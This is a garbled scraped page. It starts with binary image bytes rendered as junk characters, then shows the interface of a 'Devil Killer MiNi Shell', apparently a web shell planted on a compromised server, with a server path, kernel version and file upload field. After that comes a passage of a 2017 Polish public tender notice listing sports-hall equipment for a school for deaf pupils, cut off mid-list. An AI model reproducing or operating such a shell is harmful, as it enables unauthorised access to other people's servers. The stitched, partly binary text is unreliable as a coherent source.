JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170605/525732-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 525732-N-2017 z dnia 2017-06-05 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Ośrodek Szkolno-Wychowawczy Nr 2 dla Niesłyszących i Słabosłyszących im. J.Siestrzyńskiego w Wejherowie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa i instalacja wyposażenia wielofunkcyjnej hali sportowej w Ośrodku Szkolno-Wychowawczym nr 2 dla Niesłyszących i Słabosłyszących w Wejherowie </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Ośrodek Szkolno-Wychowawczy Nr 2 dla Niesłyszących i Słabosłyszących im. J.Siestrzyńskiego w Wejherowie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">20754000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Sobieskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">279</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">84200 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wejherowo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">58 620 82 31</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">biuro@bozp.com.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">58 620 82 31</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.osw2wejherowo.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">publiczna placówka oświatowa</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.osw2wejherowo.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.osw2wejherowo.pl/ </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Specjalny Ośrodek Szkolno - Wychowawczy nr 2 dla Niesłyszących, ul. Sobieskiego 279, 84-200 Wejherowo</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa i instalacja wyposażenia wielofunkcyjnej hali sportowej w Ośrodku Szkolno-Wychowawczym nr 2 dla Niesłyszących i Słabosłyszących w Wejherowie </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest dostawa i instalacja wyposażenia wielofunkcyjnej hali sportowej w Ośrodku Szkolno-Wychowawczym nr 2 dla Niesłyszących i Słabosłyszących w Wejherowie.2. Przedmiot zamówienia obejmuje dostawę i instalację następujących elementów wyposażenia (numeracja zgodna z opisem w załączniku nr 1b):1.0	Koszykówka boisko centralne1.1	Konstrukcja podwieszana koszykówki z napędem elektrycznym mocowana do konstrukcji nośnej stropu hali sportowej	szt.	21.2	Mechanizm regulacji wysokości zawieszenia tablicy w zakresie 305-260 cm	- szt. 21.3	Profesjonalna tablica do koszykówki szt.	21.4	Osłona dolnej krawędzi tablicy	szt	21.5	Obręcz do koszykówki szt	21.6	Siatka do obręczy turniejowa	szt	21.7	Urządzenie bezpieczeństwa dla konstrukcji podnoszonych z napędem elektrycznym	szt. 21.8	Montaż konstrukcji podwieszanej z napędem elektrycznym szt	2 2.0	Koszykówka boiska treningowe2.1	Konstrukcja do koszykówki składana elektrycznie do góry (na ścianę)	szt	22.2	Belka wsporcza rozpięta pomiędzy słupami konstrukcyjnymi do mocowania konstrukcji nad trybuną	szt	22.3	Urządzenie bezpieczeństwa dla konstrukcji podnoszonych z napędem elektrycznym - szt. 22.4	Konstrukcja do koszykówki uchylna	szt	22.5	Mechanizm regulacji wysokości zawieszenia tablicy w zakresie 305-260 cm	szt. 42.6	Profesjonalna tablica do koszykówki szt	42.7	Osłona dolnej krawędzi tablicy szt	42.8	Obręcz do koszykówki szt	42.9	Siatka do obręczy turniejowa	szt	42.10. Montaż konstrukcji składanej do góry szt	22.11. Montaż konstrukcji uchylnej.	szt	2 3.0	Siatkówka centralna3.1	Słupki do siatkówki profesjonalne	kpl	13.2	Tuleja profilu 80x80 mm	szt	23.3	Rama podłogowa	szt	23.4	Osłony słupków do siatkówki	kpl	13.5	Siatka do siatkówki turniejowa lub równoważna	szt	13.6	Stanowisko sędziowskie do siatkówki	szt.	13.7	Wieszak na siatkę ze stali nierdzewnej, z uchwytem z tworzywa	szt	13.8	Montaż tulei w podłożu	szt	2 4.0	Siatkówka - 2 boiska poprzeczne 4.1	Słupki do siatkówki profesjonalne lub równoważne	kpl	14.2	Tuleja profilu 80x80 mm	szt	44.3	Rama podłogowa szt	44.4	Osłony słupków do siatkówki	kpl	14.5	Siatka do siatkówki turniejowa lub równoważna	szt	14.6	Stanowisko sędziowskie do siatkówki	szt.	14.7	Wieszak na siatkę ze stali nierdzewnej, z uchwytem z tworzywa.	szt	14.8	Montaż tulei w podłożu	szt	45.0	Piłka ręczna centralna 5.1	Bramka do piłki ręcznej szt.	25.2	Siatka na bramkę do piłki ręcznej para	15.3	Linki elastyczne do montażu siatki do światła i szkieletu bramki	kpl.	15.4	Montaż bramek do piłki ręcznej	kpl.	1 6.0	Drabinki gimnastyczne 6.1	Drabinka gimnastyczna przyścienna 1,8x3,00 m, podwójna	szt. 46.2	Drabinka gimnastyczna przyścienna 0,9x3,00 m, pojedyncza	szt. 26.3	Drabinka gimnastyczna przyścienna 1,8x2,56 m, podwójna	szt. 16.4	Drabinka gimnastyczna przyścienna 0,9x2,56 m, pojedyncza szt. 26.5	Wspornik mocujący drabinkę	szt	306.6	Montaż drabiny podwójnej	szt	56.7	Montaż drabiny pojedynczej	szt	2 7.0	Tenis stołowy 7.1	Stół do tenisa stołowego szt.	47.2	Siatka do tenisa stołowego szt.	47.3	Stolik sędziowski szt.	47.4	Numerator - składany z miękkiego PCV	szt.	47.5	syntetyczna wielowarstwowa nawierzchnia sportowa	m2	637.6	Wózek do transportu 4 rolek wykładziny szt.	1 8.0	Kotara grodząca halę na 2 sektory 8.1	Kotara siatkowo-tkaninowa	kpl.	18.2	Zespół wciągający kotarę (podnoszenie i opuszczanie w pionie)	kpl.	18.3	Montaż konstrukcji kotary grodzącej z napędem elektrycznym	kpl.	1 9.0 Siatka osłonowa PP (polipropylenowa, bezwęzłowa)	kpl	2 z montażem 10.0. Liny i drabiny 10.1. Konstrukcja podstropowa (szyna jezdna) do zawieszania lin, drabin i kółek gimnastycznych - szt. 110.2. Lina do wspinania 9 m	szt.	210.3. Drabinka sznurowa 9 m	szt.	210.4. Montaż konstrukcji lin i drabin	szt.	111.0. Skok wzwyż11.1. Stojak do skoku wzwyż	szt.	111.2. Poprzeczka do skoku wzwyż	szt.	211.3. Zeskok do skoku wzwyż treningowy, z kołderka w komplecie	szt.	1 12.0. Tablica wyników na hali sportowej12.1. Tablica do wyświetlania wyników w grach sportowych	szt.	112.2. Zegary 24/14 sekund szt.	112.3. Konstrukcja mocująca tablicę wyników	kpl.	112.4. Konstrukcja mocująca zegary 24 sekundy na koszu podstropowym	szt.	212.5. Montaż tablicy wyników i zegarów 24 sekund kpl.	1 13.0. Wyposażenie ruchome 13.1. Skrzynia gimnastyczna trapezowa	szt.	113.2. Kozioł gimnastyczny z regulacją wysokości szt.	113.3. Odskocznia gimnastyczna standard	szt.	113.4. Równoważnia gimnastyczna niska 3 m	szt.	113.5. Materac gimnastyczny 200x120x5 cm	szt.	813.6. Materac gimnastyczny 200x120x10 cm	szt.	813.7. Materac gimnastyczny 200x120x20 cm	szt.	413.8. Ławka gimnastyczna - długość 2,0 m	szt.	413.9. Ławka gimnastyczna - długość 3,0 m	szt.	413.10. Piłka lekarska ciśnieniowa, pompowana, 1 kg. szt.	513.11. Piłka lekarska ciśnieniowa, pompowana, 2 kg. szt.	513.12. Piłka lekarska ciśnieniowa, pompowana, 3 kg. szt.	513.13 Drążek zakładany na drabinę gimnastyczną	szt.	413.14 Piłka ręczna rozm. 3	szt.	513.15 Piłka ręczna rozm. 2	szt.	513.16 Piłka do siatkówki rozm. 5	szt.	1013.17 Piłka do koszykówki rozm. 7	szt.	1013.18 Piłka nożna halowa rozm.4	szt.	313.19 Nylonowe lotki do badmintona, 6 szt. w tubie	szt.	1013.20 Rakietka do badmintona, stalowo-aluminiowa	szt.	613.21 Rakietki do tenisa stołowego szt.	1613.22 Piłeczki do tenisa stołowego kpl	1 14.0. Magazyn sprzętu sportowego14.1. Wieszak na 2 komplety słupków	kpl.	114.2. Wózek na piłki stalowy zamykany, składany	szt.	214.3. Regał metalowy magazynowy 5 półkowy szt.	2314.4. Wózek na materace	szt.	1 15.0. Wykładzina ochronna 15.1. Wykładzina ochronna w płytach - 640m215.2. Wózek do transportu i magazynowania 100 szt. wykładziny ochronnej w płytach	szt. 3 16. Trybuna 3-rzędowa składana ręcznie na ścianę przy pomocy pneumatycznego siłownika - kpl 1 17.	Siatka ochronna na okna PE (polietylenowa, węzłowa). kpl	1 18. Ścianka wspinaczkowa o charakterze sportowo-rekreacyjnym kpl	1 19.0. Osłony słupów konstrukcyjnych 19.1. Osłona ochronna na filar 40x30x40 cm, w kształcie litery "C", szt. 519.2. Osłona ochronna na filar 30x40 cm, w kształcie litery "L", szt. 219.3. Montaż materacy do słupów konstrukcyjnych przy pomocy listwy z cynkoru i rzepów szt. 7 20.1. Podłoga systemowa z nawierzchnią 4 mm 735,0 m2 21.0. Płytki gresowe21.1. Płytki gresowe - montaż w pom. 0/2 i 1/1 139,0 m221.2. Listwa przypodłogowa MDF biała	52,0 mb21.3. Mata wejściowa	szt	1,021.4. Mata wejściowa	szt	1,0 22.0. Folia matowa na okna 22.1. Folia matowa na okno - folia samoprzylepna, 2 sztuki 80x200 cm - pom. 0/8, 0/11	szt. 222.2. Folia matowa na okno - folia samoprzylepna, 6 sztuk 50x200 cm - pom. 0/9, 0/10, 0/12, 0/13 szt. 622.3. Folia matowa na okno - folia samoprzylepna, 16 sztuk 210x120 cm - pom. 0/3 sala sportowa - szt. 1622.4. Folia matowa na okno - folia samoprzylepna, 4 sztuki 110x155 cm - pom. 1/1 sala korekcyjna - szt. 422.5. Folia matowa na okno - folia samoprzylepna, 1 sztuka 50x240 cm - pom. 0/14	szt	122.6. Folia matowa na okno - folia samoprzylepna, 1 sztuka 80x240 cm - pom. 0/14	szt	122.7. Folia matowa na okno - folia samoprzylepna, 1 sztuka 90x200 cm - pom. Węzeł CO / hydrofornia - szt. 222.8. Folia matowa na okno - folia samoprzylepna, 1 sztuka 30x200 cm - pom. Węzeł CO / hydrofornia - szt	2 23.0. Siłownia - pomieszczenie 1/10 23.1. przyrząd do treningu - wyciskanie nóg	szt	123.2. przyrząd do treningu Mięśnie brzucha	szt	123.3. Ławka ze sztangą - szt. 1 23.4. Stojak na hantle z hantlami kpl	123.5 Ergometr	kpl	223.6. Telewizor szt	123.7. Aplikacja do wirtualnego wioślarstwa, laptop i przenośne okablowanie - kpl	1 24.0. Wyposażenie sanitariatów24.1. Dozownik mydła w pianie szt	424.2. Mydło w pianie szt	424.3. Mechaniczny podajnik ręczników papierowych w rolach	szt	824.4 Zapas ręczników - 20 paczek po 160 sztuk	kpl	124.5. Kosz na odpady szt	624.6. Szczotka w pojemniku ze stali nierdzewnej polerowanej, wieszana na ścianie - szt	724.7. Pojemnik na duże rolki papieru o średnicy do 19cm	szt	724.8. Zapas papieru - 12 rolek o średnicy 19cm kpl	224.9. Blat z płyty HPL szt	2 25.0. Wyposażenie meblowe ogólne25.1. Ławko-wieszak szatniowy, dł. 2 metry	szt	1225.2. Szafka ubraniowa z ławką	kpl	1325.3. Szafa wbudowana szt	125.4. Regał otwarty o wymiarach: szerokość 800 mm, głębokość 440-460 mm, wysokość 2200-2260 mm. szt. 725.5. Modułowy system siedzisk kpl	125.6. Fotel na 4 nogach	szt	425.7. Stolik z blatem drewnianym	szt	2 26.0. Pokój trenera - pom. 0/2026.1. 1.Zabudowa meblowa wykonana z płyty laminowanej - kpl. 1 2. Zlew z ociekaczem i bateria	kpl	126.2. Szafa z drzwiami płytowymi uchylnymi - szt.	126.3 Biurko prostokątne na 4 nogach - szt.	126.4 Fotel obrotowy	szt.	226.5. Stół kwadratowy o wym. 700x700 mm, wys. 720 mm. szt	126.6. Krzesło stacjonarne na 4 nogach	szt.	226.7. Stojak szatniowy, regulowany, na kółkach	szt	126.8. Szafka ubraniowa bez ławki	szt	426.9. Kozetka	szt	1 27.0. Sala korekcyjna - pom. 1/127.1. Mata do fitness szt	2027.2. Projektor biurowy	szt	127.3. Ekran elektryczny rozwijany z montażem	szt	127.4. Biurko prostokątne na 4 nogach	szt	427.5. Krzesło stacjonarne na 4 nogach	szt	1227.6. Sofa 2 osobowa	szt	327.7. Fotel na 4 nogach	szt	327.8. Stolik z blatem drewnianym szt	227.9. Szafa w zabudowie	szt	327.10	. 1.Zabudowa meblowa wykonana z płyty laminowanej - kpl.1 2.Zlew z ociekaczem i bateria. kpl	127.11 Lodówka do zabudowy	szt	127.12. Żaluzje wertykalne m2	16 28.0. Sala odpraw - pom. 0/1428.1. Flipczart mobilny na kółkach	szt	128.2. Wieszak metalowy, wolnostojący z minimum 4 ramionami do zawieszenia odzieży - szt. 228.3. Szafa z drzwiami płytowymi uchylnymi- szt. 128.4. Biurko prostokątne na 4 nogach, o wymiarach: szerokość: 1400 mm, głębokość 800 mm, wysokość 720-740mm - szt. 228.5. Krzesło stacjonarne na 4 nogach	szt.	1028.6	1.Zabudowa meblowa wykonana z płyty laminowanej - kpl. 1 2.Zlew z ociekaczem i bateria - kpl. 128.7. Stojak szatniowy, regulowany, na kółkach	kpl	1 29.0. System monitoringu i wyposażenie pom. 0/1529.1. Puszka	szt	429.2. Rejestrator szt	129.3. Switch szt	129.4. Dysk twardy szt	129.5. 